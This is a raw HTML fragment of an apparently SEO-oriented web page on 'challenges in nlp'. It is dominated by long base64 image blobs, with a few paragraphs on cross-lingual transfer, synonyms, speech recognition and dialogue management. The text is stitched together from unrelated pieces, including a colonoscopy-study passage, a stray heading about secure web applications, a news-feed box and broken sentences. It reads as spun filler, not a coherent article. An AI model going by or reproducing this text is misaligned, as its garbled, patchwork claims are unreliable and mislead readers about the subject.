9olLBm4FKM7Ulb\/AM6f0t9yshQxn+R6T71bPTuqYM40lrLbm1vYVDSQl+QKnfZkby5Dy+gEfOK3lRF0wx875nGiyub+8sMFjvYTf3rl5bxuKrzdzsXY8AS2w3JY1Lteu2NUT1NI2So1ubG1ri+Rt2+nUZFUVfFHDOWxacOB4fXclKUq1UNKUpREpSlESlKURKUpREpSlESlKURKUpREpSlESlKURK+Hzr7SiLjNV4mynxN5gs1Hd\/Bd24cT2w5Mnvhyp8jsAw8jsRt5fNVb7PwX+HGxxdlhoc7qEW2OsorC3VrexO0aTSS7v\/I\/yrFppDvJy47grxKqRcL18jXzgn9Rf9K8\/wCQ3wkilmLG8LA27BmMhu17126W484XVbNbeHroVr3VFxrDN5DLDI3Et1OO2sTRRyz2UVmz9uSB1faKH81wyvy2lEixwrFrNZ+F\/oRrV9Pte5nMQDTmEtNP2qiGGYPaW7Ax9wywOXYbfmsTHv73b5hWW03BP6i\/6U4J\/UX\/AErA2PVC1qjT8v7k6VvBVCHhA6GWmosZqjC621Vj8hjc3eZyOYLbTOss9vJEAhktiF4NJ3ORDNKw\/LmbZCkkdIunfT7oZicjgemSZbIyZaaOZluIoy3cWMJu0iRIW32LEuWI34qVRURZ14J\/UX\/SvoVR5hQP8qy7Ys8owS1BLexoB53PqTpQNAtRpTE3GGw0VteMGuXZpptjuObHcitxSlXsUbIWCOMWAFgOwaLkTc3KUpSt1hKUpREpSlESlKURKUpREryntba5Xjc28co+h1Df969aURaTNjBYSwa9mxEEh3CRxpCvKRz6KPL\/AFPoACfmrjLnOzpGJLqzwFor+XB7bkAdt+PIsvLyB+YenoK6TX3\/AMPjP\/3f\/wCMlVJ19178Mmf1NBhuo2bvLPM6Rytzxg+DrmaOEw3jQiV5I4mjVXktAASwI34kgMQfH7VqquWtdBE4hrQPs65i9zv324K9oYIGwCV4BJ4qweC13DaYL4XwuqdPy4OS2GQiuI+LWqWpXkJUkEvHtcRvy347Dff1rL+VQ\/BD5\/42ac+C47X25r3dfZ1tuAfvGTu8RHwIblvtsd99qrLD1C8IkF09yurr9NtL3Gko0Zb8wPjY2t4plhHDtu4fso0ibtujjf3G25KwsPBveaZ1ll4dU6kbTGC0zZ4HMWzWmRja0s+7JyG5iEsjl+AcLu0bQkHbzFQo21DG26SQDLjv3a8lKcIXG+FpPh7ldCLqFkZpJoYc7hJJLeUQzIse5jkO2yMBL5MdxsD5+Yr8t1GvlleFtQYMSIIyyFPeUSMUjJHd8uTKyj6SpA8waq7n8x4bNLZLN9P81Y5Sa\/izViFt0WR3mmvbOKOGeOQABOMUrjkWEi9hm8yV5fqN\/DjpDJZTp\/jxkjZ4DBS5HPXLG5K2FhhbmV12IjPcYTSzrsh8xG3mT2w7HU2v0snp046pgg0wN+fJWlGu8wxAXL4c777bQnz2HI\/\/ADPoIP8Agd6DXeYKqwy+IIfbieydjuCRt+U+gE\/5Gqc36eCrF4+9t73KZ6KG0SPIEmDJubMZIQzRpD+TPbLi3jAiTzXZ04glhWuwmkPC\/Bh8re6qvtT2ePxOt20vZyz31y5u7qOzSeIM0O8kidp285ifNPPY8RW9qkC5lk9PxLXDBuY368FdS46hZG0ha5us7hIYUVnaSSPiqqF5EkmXYAKQxP0HetnY65vLW4Rc6lubWQhDcQqydtiQByUk7qd\/zt\/Ly8ttyKTYlPBTk8bLFZ5LKlZb\/OypCEyTdu6URNkIrVXjG6rxVVWNdm99VBHIVYHTnVbQ3VXSeVyeh8pPfWqY4XIllsZ7YPFNHJ23TvIvIExyLuPRkYHYiuFRV11C3p2PecOZxXt3G5OunHgukdPTVB6NzWi\/DX2KxoIYAg7g+lfa12npHlwOPkkYlmtoySfn90Vsa+gA3F15cixslKUrKwlKUoiUpSiJSlKIlKUoiUpSiJSlKIlKUoiUpSiJSlKIlKUoiUpSiJSlKIlKUoiUpSiJSlKIlKUoi5fqAhTGWt8wPatLtXlYDfirI6cj+gFxufmG5PkK4t8PiJt2lxdm\/JnkJaBTuzrxdvT1ZfIn5x5GpakjSVGjlQMjDZlI3BFclddM8HK5azvMjYx\/NFb3LLGv\/lX0A\/QK8ttbYlRVVBnp3DO1wSRmMsiAdRytvvlc0O0IoIujlBy0tn7QoY6i2XUezv8AFw9LdJaUuLWWC6lycuTtuRWaNYhaxoqyx\/nAygueXHgvlt5GOZ38XCSpNYdOdARWy3awvj14Klxaxw3Xad5O6ShDCzARVbiQ2xKjztP8l2O+vsz96NPkux319mfvRqLHsbaEbbYYz3l3wru7aNK43u4eA96r7lbrxEppfDX+O6daJudQ3F\/dw5S1kfaG0sefbhZJDLvIzIkTsPIbe7sCg5fGfxJR2jXSaV0bHk7XVk6O1r7sWWwPsThZZA7loZpJ1twQHYqEXfmqnlYP5Lsd9fZn70afJdjvr7M\/ejTyNtAfwx83fCnlGm4u5D3qsmm4PE9kPgQar0LonDxzZSNMzDj+1cLHj4pYVVYmdhsGhNwTuHYEKFCcvd2Ftheut9pWZstpDR0eesLqC+wZFvGwt7oO0LzSHmVZvZ3bzRYyFYqDv51Yv5Lsd9fZn70afJdjvr7M\/ejWTsfaJ0bHzd8KDaFKN7uQ9647F4qGXE2hzOKs\/bXt09rXspt3TEEk9Nx6Dj5E+6APSvPPR2GPw1+lvbQxS5BGi2iQBpZWXgCdvUgbef0D9Fdr8l2O+v8AM\/ejWXiunOn8ZepkZTc31zF\/NyXUpk4f4b1H\/u3WzHBK5oadbEk27BhHrXTyvTsF2AkjS4HvW8wUElthbG3lGzx28asPoIUVnUpXugLLzaUpSiJSlKIlKUoiUpSiJSlKIlKUoiUpSiJSlKIlKUoiUpSiJSlKIlKUoiUpSiJSlKIlKUoiUpSiJSlKIlKUoiUpSiJSlKIlKUoiUpSiJSlKIlKUoi\/\/2Q==\" width=\"309px\" alt=\"challenges in nlp\"\/><\/p>\n<p><p>Transferring tasks that require actual natural language understanding from high-resource  to low-resource languages is still very challenging. With the development of cross-lingual datasets for such tasks, such as XNLI, the development of strong cross-lingual models for more reasoning tasks should hopefully become easier. The objective of NLP system adaptation is to create a system that yields consistent results in multiple, diverse settings. We describe adapting an NLP system measuring colonoscopy quality developed in 1 academic medical center11,12 to 4 diverse health care systems, emphasizing aspects we believe are generally applicable to a range of NLP applications. Using a single system to process corpora from multiple sites optimizes uniformity and minimizes maintenance costs. The first objective gives insights of the various important terminologies of NLP and NLG, and can be useful for the readers interested to start their early career in NLP and work relevant to its applications.<\/p>\n<\/p>\n<p><p>This is clearly an advantage compared to the traditional approach of statistical machine translation, in which feature engineering is crucial. Before diving into the challenges, it is imperative to have a clear understanding of NLP. It allows for seamless interaction between humans and AI systems, enabling the latter to analyze and understand human speech or written text.<\/p>\n<\/p>\n<div style='border: grey solid 1px;padding: 10px;'>\n<h3>Kickstart Your Business to the Next Level with AI Inferencing &#8211; insideBIGDATA<\/h3>\n<p>Kickstart Your Business to the Next Level with AI Inferencing.<\/p>\n<p>Posted: Mon, 30 Oct 2023 10:00:00 GMT [<a href='https:\/\/news.google.com\/rss\/articles\/CBMiY2h0dHBzOi8vaW5zaWRlYmlnZGF0YS5jb20vMjAyMy8xMC8zMC9raWNrc3RhcnQteW91ci1idXNpbmVzcy10by10aGUtbmV4dC1sZXZlbC13aXRoLWFpLWluZmVyZW5jaW5nL9IBAA?oc=5' rel=\"nofollow\">source<\/a>]<\/p>\n<\/div>\n<p><p>With spoken language, mispronunciations, different accents, stutters, etc., can be difficult for a machine to understand. However, as language databases grow and smart assistants are trained by their individual users, these issues can be minimized. Synonyms can lead to issues similar to contextual understanding because we use many different words to express the same idea. Furthermore, some of these words may convey exactly the same meaning, while some may be levels of complexity (small, little, tiny, minute) and different people use synonyms to denote slightly different meanings within their personal vocabulary. Each of these sentences have some form of the verb \u201clike\u201d and a mention of the product within a few words of each other, but the meanings are not always conveying positive sentiment.<\/p>\n<\/p>\n<p><h2>Understanding the Key Components for Efficient, Secure, and Scalable Web Applications.<\/h2>\n<\/p>\n<p><p>If you provide the system with skewed or inaccurate data, it will learn incorrectly or inefficiently. This is the process of deciphering the intent of a word, phrase or sentence. Understanding Pre-Trained Models Pre-trained models have become a game-changer  intelligence and machine learning.<\/p>\n<\/p>\n<p><img decoding=\"async\" class='aligncenter' style='display: block;margin-left:auto;margin-right:auto;' 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width=\"309px\" alt=\"challenges in nlp\"\/><\/p>\n<p><p>It\u2019s essentially the polyglot of the digital world, empowering computers to comprehend and communicate with users in a diverse array of languages. There are complex tasks in natural language processing, which may not be easily realized with deep learning alone. It involves language understanding, language generation, dialogue management, knowledge base access and inference. Dialogue management can be formalized as a sequential decision process and reinforcement learning can play a critical role. Obviously, combination of deep learning and reinforcement learning could be potentially useful for the task, which is beyond deep learning itself. In the early 1970\u2019s, the ability to perform complex calculations was placed in the palm of people\u2019s hands.<\/p>\n<\/p>\n<p><h2>NLP: Then and now<\/h2>\n<\/p>\n<p><p>Today\u2019s natural language processing (NLP) systems can do some amazing things, including enabling the transformation of unstructured data into structured numerical and\/or categorical data. Natural languages can be mutated, that is, the same set of words can be used to formulate different meaning phrases and sentences. This poses a challenge to knowledge engineers as NLPs would need to have deep parsing mechanisms and very large grammar libraries of relevant expressions to improve precision and anomaly detection.<\/p>\n<\/p>\n<p><a href=\"https:\/\/www.metadialog.com\/\"><\/p>\n<figure><img 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XCwTZOVGx5\/esYtQuMi1W2K\/KYlTo0dxDntUthrkristpcUUpVtuMj\/1YtWMIyTM5Wguu8TDsfz65P3q4224Y0Lo5bLi+B6iVAcL7aUKcI34OocQlXkD6VJbLoFmGlWmGJafaA6kxcfVi5dVJVfrP96sXtTxUt5coJdadS4p5aneTTiQCop4lOwAYm1L1fvWK9ILmoelHUC9n6zktoixMndhwzISw9c4zTsV5CGUtlxKVuJJU2hYCxuNxyq0Zpp1nN7+0eYYtWuGSWNyVpa\/c2HYlvt7io0RN1YbVASHWFAsrX+IVqBc5eAoDxU5d6JHZmi+V6b3DUlpd+zjNWM4vV6ZsgajmWmXGfW0xES9+G2UxUoG7ilbkqUVfFTbU7QPM8i1rx3XXTPUeDi1\/tVjkYzcET7KbkzNtrz6XiEpDzRbcQ4nklW5BJG4IBBDH2R9QuVaeardSc28TDccf00w2yXuz2tTLaQmS5FkrWkuJSFkLcQ2DyUoJ+m1QzNsh6m9GtBbX1ZX\/AF3k5BOZZtt4yHDnrNCbsyoctxpK4sZTbYkNraD44ulxRUUEqB5bVniT0yWW86h6u5bk18NxtGrePW\/HZlpEXtqisx477K1B7meZWH9x7E8Sn+b5GPmujzVK+YXj+i2pHUI1kGmGOvRP\/hzGMoiXS7RIq0KjQ5kzvrQW0FpsFTbSFrCfKgaD71Jv2uGadW\/9CGBarqw\/FndP2MguD0e2R5U1pz7wcZKoqnUKShxQ4JKnAtIQlXFIUQoSrpKznUK\/t6j6f6l5KjJbnpzl8jHo98MVuO9cInZaeZW+22AgOhLvElIAPEfXcmZR9FzH6iH9ehkQIewxvEvur0m23GYZPf7wX+\/Hhw\/fl9A0m0ac0wyjUjJFZGLkNQclORBgRez6HeMyz2uXNXc\/uuXPZP5ttvG9Bhjra1GwNObaR6GZ5l9ksNhyTIE5Hk715mtRoS7TbPx0R3lOqAUH5QYQlP8AN21b+Aaj\/RZkVqyHENWum3TfVaIIuCZC\/wDwvkmPPRZ3ZstwUqVGLZWHGXFtrMhpW6SBsBsCN6zvb+n2C9rvlWt+aXeJkbl2tECwWK2yLalLdlgslTj6AoqUHlPPq7hXxQUgBI3FfJ6ebdbuoi169YpdotlDWMyMZu9nYtwDdyaU+l5h3mlaQhbawflCuSTtuNqDSjSnTrPH\/sxMiyNnXLJ49rcxnIJCbGm321UVppmTNDzIWY5eKXiCVHnyHI8SnxtsliEDKNMuk23XjI+qGRY2pVps8pvJL7aresWSIplkGNHbS22hxZB4Nl0Oq5qT7Vnwbjpt0l5PhWj+W9PV71WYu+n93t9zttlYasYjz7c1OcdWsuvl5aXygvKCdkI3+T9AOm4dKmpOVaG2rSnN9arfMu2J3K03HF7zCxkMNxVW3j6cSY6n1iTy4kr2UgefAG25CD6A6+XYdRlz0tj60X3U7C5WDO5Uxcb9YxAnQJceWhpxtBTGYDzK23QsHidiAAQN97z0+P8AUP1AYZYOo9WusnGo+R3Fc+DhrdnhybUzZkSVNiM6soEhb7jTalF4OjipY2TsONTzC+nbPY+urXUBqhqrByO8fwvKxZVpt1g9BbmI7shh5JZCn3XPBac59xaysuDYoCeJsWnPSxq5pLHjafafdRSrVphAu6rlCs\/8ONvXSLGU+Xl25uct0p7BUpfuLJcCVFII8EBjDBMD1hz3qL6k4eBaxP6f2yNk9vcU\/bbbHkzZM42pkNhapCFoTHQACpKEhaySOSQNjSJ6mNe896bemzN8Sya12XL9SMyRjV5kv29D0R8JTPYW6tofAK4yXuLZRuQEghJIraTTHRZWnOoGpmcnJPvAai3mLd\/Sej7QgdmI3H7fPmru78OXLZPztsfk4xw\/osViel+i2mydSBITpBly8p9WLRw+8wp2Y52OHePZ29Xtz5L\/ALv8vnwEMjxup6B1ETemhrqUlTrLdMVZzJzJZlhhC9QUJkqjOxYnbbEfZa+C+bjS+CdwkE+6u7EupfUzTrp411yDUGfHy3IdFMhulggXJ2KI5u6EIZVEckoa2SlXKQlK+GwIT487k5+\/oaV\/WKGvn8QjYYb\/AAl90+l\/\/W+p9R3uf\/8AHhw\/fl9KiVv6ULEvFtasMynI3rpatZb9OvMkMxhHdtyJEZpntoUVLC1oLIWFkAb7bp8eQwNiWuWpVly3TW4WTWrNtTZmU3uFa8tx+dgD9vt0SPKGy5UN70TRYSwsp8LdWFo3Kt\/mpRjrvUxrnqBrZj+PdQT+G2nCMretlgTAssR+QXjDYcQiQt1tQVGbUeXBI7iy45uvZKU1lnAdKepLFlWCw37qJsl2xrH3GklTWFpZu1zit+Ex5MhUpbKd0hKVONsJWrYkFJO9SPSfRdWmGUak5IcjFzGoOTHIgwYna9FvGZZ7PLmru\/3W\/LZP5ttvHkNO9Zs3zjqQ6H9INYpWZzsbn3PIrHHukOBGjKYlzPvZuN6r8RtSkFDjK3UISQndeygoDat7dPMcv2KYtHsmSZ1c8vnsuOqcu1yjxmX3gpZKUlEZttsBIISNkg7Dz5rBEPouVC6RbL0wR9THmpuOvtz7dkjVrSC3MauKprThjKcUCkKIQU9zyBvuDWedP7Xm9nxiPC1Eym3ZDfQtxcidb7WbfHUFKJQhDJddKQlOydysk7b+N9gEjpSlApSlApSlApVgzDM7ZhUa2ybo1IcTdbrEs7AZSFEPyXA22VbkbJ5Ebn6D6Gu67ZhjNinW613vIrVb5t4e9PbY0ua2y7NdGxKGUKILitiPCdz5FBeaVHIuo2BzptytsPNbA\/LszyI1yYauTK3ITy1hCG3khW7SlKISEqAJJ2+arlZLY0qfbN4gBcaU3BeSZKN25DgSW2lefatXNGyT5PJOwO4oLrSoDkmuGm2L5RKwW45RBGTRrM9fE2nvJS+9GbSSePI7FRCSQnffiCrbiCauGBaoYhqNYWL5jV8t0gmNHfmRW5rTr9vW80lxLMhKFHtuAKG6TtQS6nzVmx3McWy+3ruuJZHa73DbeXHVIt0xuS0l1G3JsqbKgFJJG4+R9atj2q2msVqa\/M1Cxdhu3JYcmLcvDCUxkPnZhThKvYHP5Cdgr6b0Eo7LXLl2077k77fX619gAfAqwz87w+13q3Y1c8qs0S8Xfc2+3vz2m5MsDfctNFXNweP5Qdq+4Wb4fcb6rGIGVWaTeENuPLt7M9pclLbbhaWstBXMJS4lSCdtgpJSfIIoL5SrJf8ANcRxaZbrfkmUWi1Srw6Y9uYnTm2HJjvj8NlKyC4ryPCQT5H610nUDChfkYqrLrIL24440m2m4NCUpbbaXFpDXLmSlC0KOw8JUCfBFBf1NoUQVIBIO43Hwa5AA+KiV71WwDHM4sum99yiBCyTIYj8222950JckNNONtq47+ORU8kJSdivZfEHgral0t1fw7VrG4F\/xm5xDIkwIk+VazLaXMgJkt82kvtoUSgqT5G+24BIoJxSrJj+Z4plomnFcmtN4+7pKocz0E1qR6d9P5mnOCjwWPqlWxqI4BrzhOodsuEi0TGGrpbZN1YeszsxgTu3BmvxFv8Aa57hpa46ilathspIJB3oMk0rC9z6osVtklcV7HbqpSEYi57HGFjbIJqokf3IWpJ7akFSylSkkH2FVZTmZTj1vdmsT77boztujolS0PSkIMdhZUEOuAn2IUULAUdgeCtvg0F1pUevmbWmySI8QqRKednMQn22pLCVRO6lSkuOhxaSE7JJ2Tus\/RJAJEBk9VGjg\/huVa8vtdytd\/v0\/H3bmxOZEW2vRI0t91yQtSgEtkQXAlXwoKQsboPKgy6pCFjZaQR+hrkAD4FUDN+tEi0IyBi6QnLY4yJKJqJCTHUyRyDgcB4lG3nlvtt5q3QNQMKu+Mu5pZ8usc\/H2ULcXdY1xZdhpCN+ZLyVFACdvJ38UEhpUItOtOll5w6y5\/Dz+wIsGQFpFunSLg0w2+64ndDI5qB730LR94IIIBBFdreqOPpyvK8XuK025OHwYFwuE+Y8hqMlqUHyk8yfbxEdRUVbD3D9zQTKlRqRqVp9EsMLKZec46xZbkttqDcnLowmJKWskIS08VcFlRBACSdyD+lVacyxVWQqxAZJazfW4wmLtYlt+rQwTsHSzy5hBPwrbagvVKjFs1M0\/vVvfu9nzjHp0CLKRAflRboy6y1KUoISwpaVFKXCpSQEk7kqA28iuDqdp4nFTna86x0Y0FFBvH3ox6EK58Ni\/wAu2Pd7fzfPj58UEopXTElxp0ZqZDfbfYeQlxp1tYUhaFDcKSoeCCCCCPmu6gUpSgUpSgUpSgUpSgUpSgUpSgUpSgUpSgUpSgUpSggurWIXfMYONR7MlkrteVWi7yO6vj\/Z48lLjm3jyriDsPrUM1V08zS86r45m2CWJlufBECJJusicyuK5b0zg7KjvRHWlLCktgrZdYUlfdUApSUJ92ba44j9\/wDrQahW7pp1Wza43ZrU5u2wk3TCr7jkqZblxEMtzpU2O9FehsMMNrDLYZC0l9xbgXuD9VuXLTrp61WRqLYMw1Aj2dmNcJhzHKWIk5TwVkDKpzURtIKR3G0xpkQc\/bsba0OJ5EjasDam1BhDUbS7J7trF\/Glmxu2T4Vywi4Y09LcfQ2\/BlrWFtO8VJ3WhQ5I3SoFP6bE1DZ3THlIwK44hicax2J26aQjDHlMK7LS7skEIU520bqbSXHffsTs4vweR32h2G+9NqDDuhWnFyxK5ZBkF4xmZaJ95jW6M+mRcYkhLnpkOJAQ3EYabQlPPilZHJaeO4TxCagGNdK7ltGCfeeIYy6qyYhkVqupLDSu7cJrsZTTn5ffulEjdZ8jmfnkd9oQAKbCg0zvXT51AXGw4ZiTzVsdi2G14O3348iI2W5NslIduCn3VsKkuK2ab7AacQjyvltuQqf4909X+y5FiOSM2i0MT7bqdkmUXSWypIedtk5q5oZHMJBWr+0xAUH4CP8AhArY3iPmmwoNbNdNGM9y7Js+dsWF47kUbPsJi4tBm3OcGV2OS25M5uqSW1KLe0tDoLR5lyOAQN0rT9xenW+sXzK8getVnkXW4amY\/k1vuS+Hqfu2GxbWnyV8eSVlLEwBG\/kOH4CiK2QIB+a5oMU53gN7uGuGn+pNux6Bc4Nltd4s9wLjyEPxjLeguMyEBSTzDfpHgUghQLo4\/JrFGOdLGXWew4XabMbVjU6HpbkOIXi525QS63dJxgll8FIBdCVsyHORO4Udx+Y1tZsN96bUGC+nLSi\/YF3J2T4\/Jtl1bsVssjqhcYj0Z4R+6SGURmGvw0Fw8FujmQ4QUp47mLYp02ZHj9psjybLZGL3Gy\/M7vcJbJSHXoV0Fz9MlTgTusn1ELkknx2x88BWzoSB+v8A1rmg1DY6ZNT27VboambYHI1r0tiOf2vx3LDclSLht7fgNkcD\/MfHipx1F9O911iyy0t25MVjHshtxsWauh8tyHIMeU1NhdsAe\/Z5t9op3T7Jbh3PEA7B7ClBrXp5orq+nCMbuOqcu1zc6k5zCybJnIz5VH7UWOIaO0opBVuwwwsp2Hvcc\/zPTD6f8jl3rCINzwiwNWjEtTshyiSS6063MgTG7sqI4lrh4cbVNjJKFflKCQdkitmtqbD5oMKR9M9QcZ6dL\/p5hsWxN5H3b2bKxLShyC20\/cZD0ZBSpCkbBhxsBKkKSkgAgpBFUvT1pPlmGK1NdzeIBFzHIW7jCjyX4shwxxbYkZXfTHabYStS2FkpQjbbbyryTnauOI\/\/AMaDTo9OWpC7RpwLliLKo2PYDLwm8We33GFyXIV6UeqbXJjuNKaeDCw54Q6B2zsv3Jq+ag9NufXgXJ3GFttsM\/wS7EhvXBCnJjdoW+ZEdbrjS0FeziFoW42ULcQOQSNyNqeINNhQar5HoRmCMPgu4JhcmHlLFwvNzt8qdeYC0QpcsNg+qjCN6Z2O\/wASXUtp7iNt0ErcUtNYvRPUtVo1SwR3F8flSc2fyOZAzR2eEvxRcYa0MNdvtqeCmVrTH8KADDSVBW57Y2c4inEfvQaQa06WZubNe87k6U41j7NwOB45FxiNNS81cH42QNuuKkKbZ4IYAfSyhXBSuHMqSkcUVJ7p0+6oXO8x9QY+M2+zNnO5ORu4xa7hFUtqI5ZWbel1tbzCoypHcZU6UFIHF9eznLyrbctoVtuN9juPNc+CNt\/j96DHWlGM3zAccxzBIuKohWOFa31uuu3dMh+LKL6SiMEoZQhaClbp5p4pRwSgIIO4yNXA228Hx\/nXNBwpQSCT8CqKDfLRc4hn265R5UYKUjvMuBbfJKuKhyHjcKBB\/Qgj5FVikhSSCPmvL\/7SPTr+rphT9\/wu83NjAdQcibcueLxJ6ooi3hKVviXFcCVdttwNrDjXHiVcVDYgcQ9NVXm1N3JmzuXGOifIaU+1GU4kOuNpIClpRvuUgqSCQPHIb\/NVta49KGlkaZjtg6i8zmO3nOc0xqA6mY+8txFstzrDbjcKMlXhCQOJWrbktQJUT8nY0UHNKUoFKVYM4zjFtOsZnZfmd9hWe025vuSJkx4NNNjcAbqP1JIAH1JAoL\/StSsA648jvOlj+peaaEXuCZF3kRLPbrbPiuv3KA0x3lTmfUOMh1pKArkpvmBsSCRuRmPRHXCbrKi7uS9Ic8wX7pW0gIyq2piGYHAo8mClawtKePk7\/wAw+aDKVKVA9aci1KxTBJeQ6U4nBya9wHG5CrVKkKZMqMlW7zbSx4DxRvw5e3ltv+hCeUrSy2faX4hedRTids0+ur9qcsfq48rnwnOXfkEG1GIpIUl4OckHdX8hXt2\/fWz+kV31Kv2DQrxqvjtrsOQTFuuuW23yFPoislZLLa1q\/M6G+IWR7eXLbxtQTSlKUClKUClKUClKUClKUClKUClKUClKUClKUClKUClKUClKUClKUClKUClKUClKUHypXH6VrJ1RdWNx0tyOw6WaNwMfy3Uy8T45Vj02Z2VNQlcuS+XJKQ4SlOyCsHYlfFQBFbE5PJehY7c5sZfB2PDedQrYHZSUEg+f3ArzI+z96TcC6ltOsm6gtcZ10yfJ8pukqC1JXKU09b1NlCjJadSeXfKiNl\/CQnYDYmg2wyTqq1Rj5ROsOmvT2xqFEiOPtJmWPObZzWpjtCQksLIcQppTzaVAjwVJ\/UVsRjdynXiw226XO0u2yZNiNSH4TqgpcVxSApTSiPBUkkpJH1BrVSDg+O6O9YOjGl2n8L7rx6FgeRIEVCie6S9FUpxxR8uLUpCVKUryVDetvQAPgAUBX5TsfpXlp1l6cdUeu2sbXTxqhlditOFTJkrIsLuzNgkOsPhhl3eM+4yFrQ6hpTm4WPcUgj8yRXpjmGY4xgeOzsrzC9w7TaLcyp6VMluhtplA+SSf\/b5PgD5rz21R+2g0psF+dtmm+mF4y2EwSn7wlzU29p0\/q2gtuLKdvqoJP7UGUfs5bx1LZDh7b+pM21\/0bWS3N2LDgbQYc+4MxuLSJagVcktdtvYcxyWVbjYA77p1or08\/ayaEat3qNi2cWqZgF2luJZiuT30PQHVnwE+oAT2yfH50pT\/AMXmt5WJDT7QdacSpKvIKTuD\/kfrQdtKUoFecXW9h+Q9SHW\/pl0r3bMJlrwmXYlZBMjxgAVrQqSXSP1cLbCUJUrcI5KIB3IPo2pQT8navLXq\/wCqnTXQ3r8sGqrUVWWTcTxVdqkw7dLQOzJc9UCy4vchKgHkEgpJAPxuQAGa9aejzSDQPQHVjPsGZvCpsPC7lDs0e43JyXGsLLjJD6YCHNyx3SVFZ3KjyUNwCQdtNJpD0zTDEZslwuPyLFAdcWflSlMIJJryt1h+11smsukOa6W3HRidZl5LZpNtjzWbyiSltxxJSkrQWke3432JI\/Q16UdMWpeD6maJ4jesGyKJdoka0RIT6mF7qYkNMoStpxH5kLBHwQD9frQZXqL6k6kYTpLh0\/PNQ741aLDbQgypjiFrDYUoIT7UAqJKlAbAE+ak4IUNx8GrVlOL2LM7BOxfJ7VGudquTC40uHJbC2nm1DylST4NB41W7X7QyJ9qM\/rojLIKNPVyVyBdhEe7RUq1Fvn2+33Ny8T54\/J3P617D6eag4fqliFvzrAr21d7FdEFyJMaQpCXUhRSfasBQ2UkjYgfFa0D7OjADgbGlD2Y3V3DmclVevQqjMeoXA25JtipfHvFkOe7ffcg7fQGtqcex6zYrZYWPY9bI1uttuYRGixIzYQ0y2kbJSlI8AAfSguVKUoFKUoFKUoFKUoFKUoFKUoFKUoFKUoFKUoFKUoFKUoFKUoFKUoFKUoFKUoFKUoLVlLTkjHLnGZ483obzaeSthuUEDc\/Qea1d+zIx6Zi3S5Ct8u2sw1G83BYaakIe32WEFRKFKAJKT43322\/WtsZkdMqM7HWAUuIKCP2IqMab6f2rTjHE43ZmENxw8t7ZI2G6tt\/\/aibu2omJayI1t+0Fsr1txKfaI+BWHIbFKdlyo7nqXe8gBxtLa1KCT2z+YA+RW69\/v1pxmzTL\/fbhHgW+3sLkypMhYQ2y0gEqWpR8AAAmrMNPMeZzKNmcS1RI81iM9HK2WUoK+6oFRUQPJ8fWrzf8eseU2qRYsks8K622YkIkQ5rCXmHk7g7LQoFKhuAdiPpQm3hF179b2R9UOavY5jMuTB06scgptsMboM9xPj1b4+p+eCT+VJ+ORNakKSpXyD\/APTX6Xh03dPm3nQ3Ad\/\/ANuQ\/wDTp\/Vu6e\/8DcB\/7ch\/6dFfmhAUghQB8fsa9RPsxOvqbGmQOnLWe9qdjP8AGPi13mO+Wl\/CYTq1Hyk+A0T+XYI+CkD0a\/q3dPf+BuA\/9uQ\/9OuU9OPT+24lxrRDAkqSQUqGOxAQQdwQQ3QZFBB8g7iijskn9BXCEJQAlIAAGwFckbgj9aDz\/wDtK+vFeitnd0X0ouqRnN3jg3Gcyvc2aKseOJHgPrH5f9xPu+SmvGCVIlTX3ZEt5x515ZccccJUpaidySTuSSfO9fpku2guiF\/ucm9X3SDDLjcJjhdkSpdjjPPPLPypa1IJUT+pNUn9W7p7\/wADcB\/7ch\/6dB+aDtn9D\/0NZz6S+qvOulnUePlFgcemWGWtDV8spc4tTo4Pnbfwl1I34L28HwdwSD72f1bunv8AwNwH\/tyH\/p0\/q3dPf+BuA\/8AbkP\/AE6C76Uan4hrFgdo1EwS6NXCz3hhL7DifCkn4UhaflK0qBCkn4INTCrFimD4fgkFdrwnFbRYITjpeXGtkNuK0pZABUUNgDfYDz+1X2gUpSgUpSgUpSgUpSgUpSgUpSgUpSgUpSgUpSgUpSgUpSgUpSgUpSgUpSgUpSgUpSgUpSgVxXNcb0HNKV8q328Dc0HO4\/UUBB+DWpetDHUDdtW8ewa9a\/QdPcZy6dJj2NWM2gLmylstpcEd+RIUQ24tHMjgnY9sj6gHbCM2pplCFuFxQSApR+VEDbego7\/kNjxW0Sr\/AJJd4lrtsJvuyZkt1LTLKN\/zLWrwB5+TVay+0+2l1p1K0LG6VA7gj9qsGomGWHUXBr9guTxi\/ar9b3rfLQCAe26gpJB+hG+4P0IFeZHSl1R9RWYa4OafYldrhnELBsdesDVrSG49tmmM92I9xfkK3WjkkNFRAKlEkAbHwHqyCD8GuahmlLWqSMVbXrBIx1zInXXFuIsKHUxWWirdtsF08lqSDsVbAE\/QVM6DgkD5NfCnW0kJK\/KjsP3qnu0WZMt8iPb55hSXGloZkBAX2lkbBfE+DsfOx+dq1M0s04cY6qJth1V1xz7Ls0xO1MZHaGpMtuJaX4kkOR3VohspCN218kEEnwtB3J3ADbt6QywyqQ86lDaElalkgBKR8kn9Kt+O5Nj2W2xu94xfIN2t7xUG5UJ9LzSylRSoBSSQdiCD+9a99e+sWW6N6LCdhlvtUqbfZT1seFzQtbAjeikPvDikglSkMFA8gbqrWb7OLqdTh2m8zH8ywdNnwxifIRbrlY7dMlhE0Btx5mQhJdcClIebUhXgEIUD5A3yvJO3WupjubemNcbgfJrphymZsVqXHJLbyEuIJSUkpI3Hg+R4NWzM8ffyrFbtjsW9TrO\/cobsVu4QHOEiItaSA62r6KSTuPH0rVyvPJPxuKAg\/BFeZGq3Vh1M6D606f6NZ3kyH7ja5AbdMSEhxGaRH1hqG4VHzHc5BSHBukBQKhy+K3o0OwnUfGrXcr1qpnMi\/wB\/yKUJ70VA4QbSjiAiJFR8hCRtuoklStzQZQpSlApSlApSlApSlApSlApSlApSlApSlApSlApSlApSlApSlApSlApSlApSlApSlB0TZLUOM7KkOdtplCnFq\/3Ugbk\/9BWgGBfaCYvl3WGu1N6pym9OLzCatlotkuz9lIuBICXi6RyCVnfZSjsQtIKU7b1vtf4jk+yT7e0oJXKjOsJJ+AVIIBP\/AFryA0I6fxb+tqBpvqBDhXe2NtysZujTSllDjkext81JOwUlO6klKtwdwCNqw5cspZI6xkv29jUqCh8+f\/NckA+CN6i2nunGN6aWl2z4y5dVx33zIUbjdZM9zmQAdnJC1qA2SPaDt8nbzUpJ2raXblrv11YhdrzoZLznFEqGUaaTY+a2RSE8ld+Erm4jb+YKZ7qSPruKzHpvm9p1HwKwZ9Y30uW\/ILbHuEdQO44uoCtv8wTsf3Fa2\/aDdY1p6atNZFlxy6W57P742lNstz8cSUJjlWzrzyNxxRxCwnf5Vt4I328cLP1e9SeN4pbcHxjV2\/WWw2gOCFBt7wYQ0FuKWRukBRHJatgSdh